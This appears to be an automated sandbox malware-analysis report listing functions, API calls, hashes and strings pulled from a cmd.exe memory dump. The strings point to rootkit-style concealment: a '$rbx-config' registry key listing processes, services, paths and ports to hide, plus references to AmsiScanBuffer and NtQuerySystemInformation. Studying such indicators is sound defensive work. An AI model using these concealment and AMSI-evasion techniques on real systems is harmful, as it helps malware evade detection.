Instruction ID: 0498aa1dbc29374422a96932197095c888f62193c30f87e463b033fc6eee01ba
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: F2316F72325B80D6EB60AFA0E8443ED7764F788758F44442ADE4E5BB98DF78C698C710

Function 00000224139384B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000224139384CC
RtlCaptureContext.NTDLL ref: 00000224139384F9
RtlLookupFunctionEntry.NTDLL ref: 0000022413938513
RtlVirtualUnwind.NTDLL ref: 0000022413938554
IsDebuggerPresent.KERNEL32 ref: 00000224139385A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000224139385C5
UnhandledExceptionFilter.KERNEL32 ref: 00000224139385D0

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: e15c45c713a06b50ee8ece8ea4f3ee4c1bbed9dfdda644c8eb08eb4835d559d3
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 9E315072215B80D6EF64AFA0E8443ED7764F784748F44442ADE4E4BB99EF78C598C710

Function 000002241390CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002241390CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002241390CE23
RtlVirtualUnwind.NTDLL ref: 000002241390CE5E
IsDebuggerPresent.KERNEL32 ref: 000002241390CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002241390CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002241390CEAC

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 7ea823d6189b7573bec4f0af993b78936321b9b892c5dcb7711c6ffe02fc81d5
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 39418D32224F80D6EB60DF65E84439E7BA4F788768F540125EE8D5BB98DF38C5A5CB00

Function 000002241393CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002241393CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002241393CE23
RtlVirtualUnwind.NTDLL ref: 000002241393CE5E
IsDebuggerPresent.KERNEL32 ref: 000002241393CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002241393CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002241393CEAC

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e8db32560768e090ef3704fc7e388940164e28af2572e3d7df4e56153dbb77b6
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 69416236224F8096DB60DFB5E84439E77A4F788758F500125EE9D4BBA8DF38C5A5CB00

Function 000002241390DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002241390DB99
FindNextFileW.KERNEL32 ref: 000002241390DCCF
FindClose.KERNEL32 ref: 000002241390DD0F
FindClose.KERNEL32 ref: 000002241390DD3B

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 776d68c7eba99e32be5247fa9ed47b0f6f1487eba6b02807f9c376964d5059a3
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 9CA1D822724681A9FF20BBB5A4883AD7FA9E741B9CF144115DE5D2FA9DDA38C4E1C700

Function 000002241393DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002241393DB99
FindNextFileW.KERNEL32 ref: 000002241393DCCF
FindClose.KERNEL32 ref: 000002241393DD0F
FindClose.KERNEL32 ref: 000002241393DD3B

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 2bf1fb57dd21c23cfd6284a090775e6b6934a6b5f4ce0aa804996e7be4086b72
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: B9A1F7A272468165FF20ABB5E6683AD7FA1E74179CF144115DE9C2FABDCA34C4E1C700

Function 0000022413908090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000224139080BC
GetCurrentThreadId.KERNEL32 ref: 00000224139080CA
GetCurrentProcessId.KERNEL32 ref: 00000224139080D6
QueryPerformanceCounter.KERNEL32 ref: 00000224139080E6

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: f98951ee6a5d0b79b4de4d5562e651eca8c5bad4e36fe470e1c74e0056a119e3
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 0E113026721F049AEF40DFA0E8593A937A4F71976CF440E21DE6D5A7A8DF78C5A4C340

Function 0000022413901D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022413901D69
HeapAlloc.KERNEL32 ref: 0000022413901D77
GetProcessHeap.KERNEL32 ref: 0000022413901D9C
HeapFree.KERNEL32 ref: 0000022413901DAA

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: ed9897c711d40394cd197855c17d5ccb05c1122834e2a7d72c664195d32a48a9
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 5711C425621B80D1EE55EBA6A40815A7BB5F788FD4F5D4024DE4E5B729DF38C892C300

Function 000002241390D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000002241390D220: HeapAlloc.KERNEL32(?,?,00000000,000002241390C987), ref: 000002241390D275

Part of subcall function 0000022413910EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022413910EEB

FindFirstFileExW.KERNEL32 ref: 000002241390DB99

Part of subcall function 000002241390D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2B6
Part of subcall function 000002241390D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2C0

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 1b0d8e01587559f9ce4049a66e287763439e839d45d3381aace20028859b0066
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: FF81FA22324780A5FF20FBA5A54836EBF99E7457D8F044115AEAD1B79DDF38C4E18700

Function 000002241393D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000002241393D220: HeapAlloc.KERNEL32(?,?,00000000,000002241393C987), ref: 000002241393D275

Part of subcall function 0000022413940EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022413940EEB

FindFirstFileExW.KERNEL32 ref: 000002241393DB99

Part of subcall function 000002241393D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2B6
Part of subcall function 000002241393D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2C0

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 3bc227a5684101ec9e2c68f0333c7808447b48c62877aa9a72c84e4be7076e10
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: C681F962324680A5FF20EFB5E66836EBF91E745798F044115EE9D4BBA9DF38C4A18700

Function 00000224138D23F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4cedc39b514f19843c9bdcdc6ed9f2f92d6b011fe91a767adbbe362769053391
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 89B1A022210790A2EFA8AFA5D5187A9BBE4F744BACF045026EE0D5B794DF35DDE0C740

Function 00000224138DCE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: f4c40b9c64bc3898efb103a0b48a6f98a75362c4add2de227f5c03a3a9a542a8
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: 52A1C522714680A9FF20ABB5E8483AD7FF1E781B9CF144115DE9D2F695DA38D4E68700

Function 00000224138DCC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: 6177448400d7ba4cbe306044c28fcaf71f7842219b15ea7942b4dec437c2c88c
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 4981D96230068065EF20EFA2E44839EBFE1E785B98F544525EE9D4F7D5DF38D0A18700

Function 00000224138E2AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: 766d32c59a56e53c74f1ed7200c442cd3322c5d57ff7fc30510cfbcfc356adc3
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: C51161B1754694EBFFA9AF69A45A3293BD5F389388F448029D44D8EA94C73DC4F08F04

Function 0000022413901724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002241390172F
HeapAlloc.KERNEL32 ref: 000002241390173E

Part of subcall function 0000022413901264: GetProcessHeap.KERNEL32 ref: 000002241390126A
Part of subcall function 0000022413901264: HeapAlloc.KERNEL32 ref: 0000022413901279
Part of subcall function 0000022413901264: GetProcessHeap.KERNEL32 ref: 0000022413901293
Part of subcall function 0000022413901264: HeapAlloc.KERNEL32 ref: 00000224139012A4

Part of subcall function 0000022413901000: GetProcessHeap.KERNEL32 ref: 0000022413901006
Part of subcall function 0000022413901000: HeapAlloc.KERNEL32 ref: 0000022413901015
Part of subcall function 0000022413901000: GetProcessHeap.KERNEL32 ref: 0000022413901028
Part of subcall function 0000022413901000: HeapAlloc.KERNEL32 ref: 0000022413901037

RegOpenKeyExW.ADVAPI32 ref: 00000224139017AE
RegOpenKeyExW.ADVAPI32 ref: 00000224139017DB
RegCloseKey.ADVAPI32 ref: 00000224139017F5
RegOpenKeyExW.ADVAPI32 ref: 0000022413901815
RegCloseKey.ADVAPI32 ref: 0000022413901830
RegOpenKeyExW.ADVAPI32 ref: 0000022413901850
RegCloseKey.ADVAPI32 ref: 000002241390186B
RegOpenKeyExW.ADVAPI32 ref: 000002241390188B
RegCloseKey.ADVAPI32 ref: 00000224139018A6
RegOpenKeyExW.ADVAPI32 ref: 00000224139018C6
RegCloseKey.ADVAPI32 ref: 00000224139018E1
RegOpenKeyExW.ADVAPI32 ref: 0000022413901901
RegCloseKey.ADVAPI32 ref: 000002241390191C
RegOpenKeyExW.ADVAPI32 ref: 000002241390193C
RegCloseKey.ADVAPI32 ref: 0000022413901957
RegOpenKeyExW.ADVAPI32 ref: 0000022413901977
RegCloseKey.ADVAPI32 ref: 0000022413901992
RegCloseKey.ADVAPI32 ref: 000002241390199C

Part of subcall function 00000224139012B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022413901315
Part of subcall function 00000224139012B8: GetProcessHeap.KERNEL32 ref: 0000022413901323
Part of subcall function 00000224139012B8: HeapAlloc.KERNEL32 ref: 0000022413901334
Part of subcall function 00000224139012B8: RegEnumValueW.ADVAPI32 ref: 0000022413901393
Part of subcall function 00000224139012B8: GetProcessHeap.KERNEL32 ref: 00000224139013DB
Part of subcall function 00000224139012B8: HeapAlloc.KERNEL32 ref: 00000224139013E9
Part of subcall function 00000224139012B8: GetProcessHeap.KERNEL32 ref: 0000022413901406
Part of subcall function 00000224139012B8: HeapFree.KERNEL32 ref: 0000022413901414
Part of subcall function 00000224139012B8: lstrlenW.KERNEL32 ref: 000002241390141D
Part of subcall function 00000224139012B8: GetProcessHeap.KERNEL32 ref: 000002241390142B
Part of subcall function 00000224139012B8: HeapAlloc.KERNEL32 ref: 0000022413901439

Strings

tcp_local, xrefs: 00000224139018FA
process_names, xrefs: 0000022413901849
startup, xrefs: 00000224139017D1
tcp_remote, xrefs: 0000022413901935
SOFTWARE\$rbx-config, xrefs: 000002241390178E
udp, xrefs: 0000022413901970
paths, xrefs: 0000022413901884
pid, xrefs: 000002241390180E
service_names, xrefs: 00000224139018BF

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 5d37a0c685110da076ab4605ade1792d07ea55b25189914f174853be19274093
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 8A715E6A320A40E6EF10EFA6E8986993B78FB84B9CF451111DD4D5B72CDF34C8A4C740

Function 0000022413931724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002241393172F
HeapAlloc.KERNEL32 ref: 000002241393173E

Part of subcall function 0000022413931264: GetProcessHeap.KERNEL32 ref: 000002241393126A
Part of subcall function 0000022413931264: HeapAlloc.KERNEL32 ref: 0000022413931279
Part of subcall function 0000022413931264: GetProcessHeap.KERNEL32 ref: 0000022413931293
Part of subcall function 0000022413931264: HeapAlloc.KERNEL32 ref: 00000224139312A4

Part of subcall function 0000022413931000: GetProcessHeap.KERNEL32 ref: 0000022413931006
Part of subcall function 0000022413931000: HeapAlloc.KERNEL32 ref: 0000022413931015
Part of subcall function 0000022413931000: GetProcessHeap.KERNEL32 ref: 0000022413931028
Part of subcall function 0000022413931000: HeapAlloc.KERNEL32 ref: 0000022413931037

RegOpenKeyExW.ADVAPI32 ref: 00000224139317AE
RegOpenKeyExW.ADVAPI32 ref: 00000224139317DB
RegCloseKey.ADVAPI32 ref: 00000224139317F5
RegOpenKeyExW.ADVAPI32 ref: 0000022413931815
RegCloseKey.ADVAPI32 ref: 0000022413931830
RegOpenKeyExW.ADVAPI32 ref: 0000022413931850
RegCloseKey.ADVAPI32 ref: 000002241393186B
RegOpenKeyExW.ADVAPI32 ref: 000002241393188B
RegCloseKey.ADVAPI32 ref: 00000224139318A6
RegOpenKeyExW.ADVAPI32 ref: 00000224139318C6
RegCloseKey.ADVAPI32 ref: 00000224139318E1
RegOpenKeyExW.ADVAPI32 ref: 0000022413931901
RegCloseKey.ADVAPI32 ref: 000002241393191C
RegOpenKeyExW.ADVAPI32 ref: 000002241393193C
RegCloseKey.ADVAPI32 ref: 0000022413931957
RegOpenKeyExW.ADVAPI32 ref: 0000022413931977
RegCloseKey.ADVAPI32 ref: 0000022413931992
RegCloseKey.ADVAPI32 ref: 000002241393199C

Part of subcall function 00000224139312B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022413931315
Part of subcall function 00000224139312B8: GetProcessHeap.KERNEL32 ref: 0000022413931323
Part of subcall function 00000224139312B8: HeapAlloc.KERNEL32 ref: 0000022413931334
Part of subcall function 00000224139312B8: RegEnumValueW.ADVAPI32 ref: 0000022413931393
Part of subcall function 00000224139312B8: GetProcessHeap.KERNEL32 ref: 00000224139313DB
Part of subcall function 00000224139312B8: HeapAlloc.KERNEL32 ref: 00000224139313E9
Part of subcall function 00000224139312B8: GetProcessHeap.KERNEL32 ref: 0000022413931406
Part of subcall function 00000224139312B8: HeapFree.KERNEL32 ref: 0000022413931414
Part of subcall function 00000224139312B8: lstrlenW.KERNEL32 ref: 000002241393141D
Part of subcall function 00000224139312B8: GetProcessHeap.KERNEL32 ref: 000002241393142B
Part of subcall function 00000224139312B8: HeapAlloc.KERNEL32 ref: 0000022413931439

Strings

SOFTWARE\$rbx-config, xrefs: 000002241393178E
paths, xrefs: 0000022413931884
service_names, xrefs: 00000224139318BF
tcp_local, xrefs: 00000224139318FA
tcp_remote, xrefs: 0000022413931935
startup, xrefs: 00000224139317D1
process_names, xrefs: 0000022413931849
udp, xrefs: 0000022413931970
pid, xrefs: 000002241393180E

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 080ff768466fe520258121575b6818bb3b880ed551ff155cd3559e839e5e88ee
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: E271E9A6220A51E6EF20BFB6E9586993BB4FB84B8CF405111DD4D5BB7CDE38C4A4C740

Function 0000022413931E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022413931E7F

Part of subcall function 00000224139322A8: GetModuleHandleA.KERNEL32(?,?,?,0000022413931EB1), ref: 00000224139322C0
Part of subcall function 00000224139322A8: GetProcAddress.KERNEL32(?,?,?,0000022413931EB1), ref: 00000224139322D1

CreateThread.KERNEL32 ref: 0000022413932043
TlsAlloc.KERNEL32 ref: 0000022413932049
TlsAlloc.KERNEL32 ref: 0000022413932055
TlsAlloc.KERNEL32 ref: 0000022413932061
TlsAlloc.KERNEL32 ref: 000002241393206D
TlsAlloc.KERNEL32 ref: 0000022413932079
TlsAlloc.KERNEL32 ref: 0000022413932085

Strings

EnumServicesStatusExW, xrefs: 0000022413931F71, 0000022413931F92
AmsiScanBuffer, xrefs: 0000022413932012
NtQuerySystemInformation, xrefs: 0000022413931EA5
EnumServiceGroupW, xrefs: 0000022413931F50
